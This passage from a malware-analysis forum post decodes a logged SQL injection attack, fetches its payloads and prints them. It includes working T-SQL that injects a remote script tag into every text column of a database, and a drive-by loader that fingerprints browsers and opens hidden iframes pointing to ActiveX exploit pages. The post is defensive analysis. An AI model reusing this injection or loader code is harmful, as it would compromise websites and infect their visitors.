42046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 524 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" (malwareremoval.com) "-"

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


Code: [Select]
--14:08:09--  http://www2.s800qn.cn/csrss/w.js
           => `w.js'
Resolving www2.s800qn.cn... 121.11.76.85
Connecting to www2.s800qn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
window.onerror=function()
{

document.write("<iframe  width=0 height=0 src=http://www2.s800qn.cn/csrss/new.htm></iframe>");

return true;
}

if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

document.write("<iframe  width=0 height=0 src=http://www2.s800qn.cn/csrss/new.htm></iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}


Code: [Select]
--14:11:17--  http://www2.s800qn.cn/csrss/new.htm
           => `new.htm'
Resolving www2.s800qn.cn... 121.11.76.85
Connecting to www2.s800qn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src="http://s46.cnzz.com/stat.php?id=1084964&web_id=1084964" language="JavaScript" charset="gb2312"></script>
<SCRIPT>
document.write("<iframe width=50 height=0 src=flash.htm></iframe>");
document.write("<iframe width=50 height=0 src=ani.htm></iframe>");
document.write("<iframe width=100 height=0 src=cx.htm></iframe>");
document.write("<iframe width=100 height=0 src=mi.htm></iframe>");
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=06014.htm></iframe>");
try{var n;
var ll=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0 src=ff.htm></iframe>");}}
try{var w;
var ml=new ActiveXObject("DPClient.Vod");}
catch(w){};                     
finally{if(w!="[object Error]"){document.write("<iframe width=100 height=0 src=xl.htm></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="6.0.14.552")
document.write("<iframe width=100 height=0 src=real10.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=real11.htm></iframe>");
}
test();
</SCRIPT>
</HEAD>
</HTML>
<iframe width=50 height=0 src=tr.htm></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/2204425.js"></script>
<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>


Code: [Select]
--14:14:26--  http://js.users.51.la/2204425.js
           => `2204425.js'
Resolving js.users.51.la... 121.11.69.211
Connecting to js.users.51.la[121.11.69.211]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
document.write ('<a href="http://www.51.la/?2204425" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_7.gif" style="border:none" /></a>\n');


Code: [Select]
--14:18:32--  http://www.51.la/?2204425
           => `?2204425'
Resolving www.51.la... 222.88.95.2
Connecting to www.51.la[222.88.95.2]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<style type="text/css">
body,td,p {font-size:12px;line-height:120%;font-family:宋体;word-break: break-all}
input {font: 14px "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif;;padding:4px;vertical-align:middle;border:1px solid #CCCCCC;background:#fff;}
p {line-height:17px;text-align:left;margin:6px 0px}
a {color: #000000;text-decoration: none;}
a:hover {color: #1562BF;text-decoration: none}
.a1 {color: #1562BF;text-decoration: none;}
.a1:hover {color: #000;text-decoration: none;}
img {border:none;vertical-align:middle;}
div {text-align:left}
.left {float: left;}
.right {float: right;}
.fonts {color:#1562BF}
.vcode {border: 1px solid #3C67BF;background:#DDE8FC;vertical-align: text-bottom;padding:6px;}
#allbody {width:760px;margin: 0 auto}
.form {padding:9px 0px 9px 20px;margin:0px;}
#iright {padding:9px;width:237px;margin-right:4px;border:1px solid #999;background:#F3F3F3;filter: Alpha(Opacity=92, FinishOpacity=2); opacity:0.92;}
.btlogin {border:none;background:url('images/index_bt_login.gif');width:81px;height:33px;}
#it123 {margin:12px 0px;}
#it123 p {line-height:17px;color:#666}
#bottom  {float: left;width:760px;height:62px;text-align: center;margin-top:3px;padding:20px 0px 0px 0px;background:url('../images/bottom_bg.gif')}
#userlogin {height:270px;width:100%;}
#guestin {height:270px;width:100%;}
</style>
<title>大牛X统计报告 - “我要啦”提供</title>
</head>
<body style="margin-top:12px">
<div id="allbody">
 <div id="tops" style="width:760px;height:55px">
  <div class="left"><img src="images/index_logo.gif" alt="我要啦免费网站访问统计系统" /></div>
  <div class="right"><p style="text-align:right;padding:0px;margin:0px">
   <a href="http://old.51.la/" class="a1">怀念旧版</a>
   | <a href="reg.asp">免费申请</a>
   | <a href="login.asp">登录</a>

   | <a href="http://bbs.51.la/" target="_blank">站长交流大厅</a>
   | <a href="http://top.51.la/" target="_blank">排行榜</a>
   | <a href="news.asp">日志</a>
   | <a href="http://help.51.la/">帮助</a></p>
  <p style="text-align:right;padding:2px 0px 0px 0px;margin:0px;color:red"><img src="images/index_zhuyi.gif" alt="注意" /> 注意: 您已经离开刚才访问的网站 ,进入了 51.La 免费统计服务网站</p>
  </div>
 </div>
 <div id="bodys" style="width:760px;height:auto;overflow:hidden;background:url('images/index_show.jpg') no-repeat 0px 25px">
  <!--右侧内容-->
  <div class="right" id="iright">
   <div id="userlogin" style="display:none">
   <img src="images/index_rtext_login.gif" alt="我要啦用户登录" />
   <form id="f1" action="login.asp" method="post" class="form">
<p>用户名 <input name="uname" id="uname" style="width:140px" /></p>
<p>密 码 <input type="password" name="upass" id="upass" style="width:140px" /></p>
<p>验证码 <input name="vcode" id="vcode" style="width:45px" /> 请输入 <span class="vcode"><img alt="验证码" src="user/vcode.asp" style="height:10px;width:40px" /></span></p>
<p>
<input type="submit" value=" &nbsp; " class="btlogin" /> &nbsp;&nbsp;
<a href="reg.asp"><img src="images/index_bt_reg.gif" alt="免费注册" /></a>
</p>
<p style="padding:9px 0px 6px 0px;text-indent: -3px;"><input type="checkbox" name="remb" value="yes" style="border:none;background:#F3F3F3;" />记住这个身份(共用电脑者慎用)</p>
<p><a href="usergetpass.asp" class="a1">忘记了密码?</a>
    <br /><a href="about.asp" class="a1">深入了解我要啦免费统计……</a>
<br />
</p>
   </form>
   </div>

   <div id="guestin">
   <img src="images/index_rtext_report.gif" alt="查看用户统计报表" />
    <div class="form">

<form target="_top" action="report/0_help.asp" method="post" style="padding:0px;margin:0px">
  <p class="fonts">用户网站【大牛X】</p>
  <p>报表未公开<br />请输入独立查看密码以打开报表</p>
  <input type="hidden" name="id" value="2204425" />
  <input type="hidden" name="t" value="chalogin" />
  <p>查看权密码 <input name="lookpass" type="password" size="14" /></p>
  <p style="padding:5px 0px 12px 0px;"><input type="submit" value=" &nbsp; " class="btlogin" /></p>
</form>
    <p><a href="http://help.51.la/faq/#17" target="_blank" class="a1">什么是独立查看密码?</a></p>

    <p><a href="#" onclick="document.getElementById('userlogin').style.display='';document.getElementById('guestin').style.display='none';return false;" class="a1">切换到用户登录界面
</p>
</div>
   </div>

   <img src="images/index_rtext_reg.gif" alt="免费注册我要啦用户" />
   <div class="form">
    <p><a href="reg.asp"><img src="images/index_regnow.gif" alt="立即免费申请" /></a><br /><a href="report/1_main.asp?id=1" class="a1">观看功能演示</a>
    </p>
   </div>
  </div>
  <!--左侧内容-->
  <div class="left" style="width:492px">
   <div style="height:17px;padding-top:8px"><img src="images/index_loveme.gif" alt="中文站长必备工具" /></div>
   <div><img src="images/index_showtop.jpg" alt="封面" usemap="#Map" /></div>
   <map name="Map"><area shape="rect" coords="320,120,425,143" href="report/1_main.asp?id=1" alt="点击观看功能演示" target="_blank"></map>
   <div id="it123">
    <table>
<tr><td style="width:50px;text-align:center;"><img src="images/index_1.gif" alt="您真的了解您的站点吗?" /><br /><br /><br /></td><td><img src="images/index_1b.gif" alt="您真的了解您的站点吗?" /><p>每天有多少人访问您的网站? 现在有谁正在您的网站上? 他们做了什么?<br />他们从何而来? 搜索引擎为您带来多少点击? 访问者搜索的关键词是什么?<br />您的哪个栏目哪个网页更受欢迎? ……</p></td></tr>
<tr><td style="width:50px;text-align:center;"><img src="images/index_2.gif" alt="我要啦免费统计就是您智明的眼睛!" /><br /><br /><br /></td><td><img src="images/index_2b.gif" alt="我要啦免费统计就是您智明的眼睛!" /><p>成熟、完善、人性化的功能设计,符合并引导着中文站长使用习惯。<br />有了我要啦免费统计,您的问题将迎刃而解!<br /><br /></p></td></tr>
<tr><td style="width:50px;text-align:center;"><img src="images/index_3.gif" alt="知名的站长社区" /><br /><br /><br /></td><td><img src="images/index_3b.gif" alt="知名的站长社区" /><p>畅游我要啦站长交流大厅,结识热情、友善、成熟的互连网同行,<br />您的视野会更加开阔,站点建设和推广将更加得心应手。<br /><br /></p></td></tr>
</table>
   </div>
  </div>
 </div>

 <div style="width:760px;text-align: center;margin-bottom:18px;float: left;">
  <a href="http://www.firstdh.com/reg.php" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_firstdh.gif" /></a>
  <a href="http://www.15ai.com/spltb.html" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_15ai.gif" /></a>
  <a href="http://www.kaikai8.com/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_kaikai8.gif" /></a>
  <a href="http://www.9v.cn/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_9v.gif" /></a>
  <a href="http://www.leledh.com/add.asp" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_leledh.gif" /></a>
  <a href="http://www.jjoobb.cn/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_jjoobb.gif" /></a>
</div>

 <!--版权栏-->
 <div style="float: left;width:760px;text-align:center;margin-top:0px">
 <a class="a1" href="/rule.asp">用户守则</a>
 | <a class="a1" href="/usergetpass.asp">找回密码</a>
 | <a class="a1" href="/friend.asp">广告联系</a>
 | <a class="a1" href="/users.asp">典型用户</a>
 | <a class="a1" href="/contact.asp">联系我们</a>
 | <a class="a1" href="/about.asp">关于我们</a>
 </div>
 <div id="bottom">
 服务器及带宽由 <a href="http://www.zitian.cn/" target="_blank">紫田网络(Zitian.CN)</a> 提供<br />
 我要啦免费统计 Powered by <a href="http://www.ajiang.net/" target="_blank">Ajiang.net</a> 版权所有 2002-2008 豫ICP备05009218号<br />
 
<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script type="text/javascript" src="http://js.users.51.la/5.js"></script>
 <noscript><a href="http://www.51.la/?5" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/5.asp" style="border:none" /></a></noscript>
 </div>
</div>
</body>
</html>


<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

October 14, 2008, 03:55:19 pm
Reply #111

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964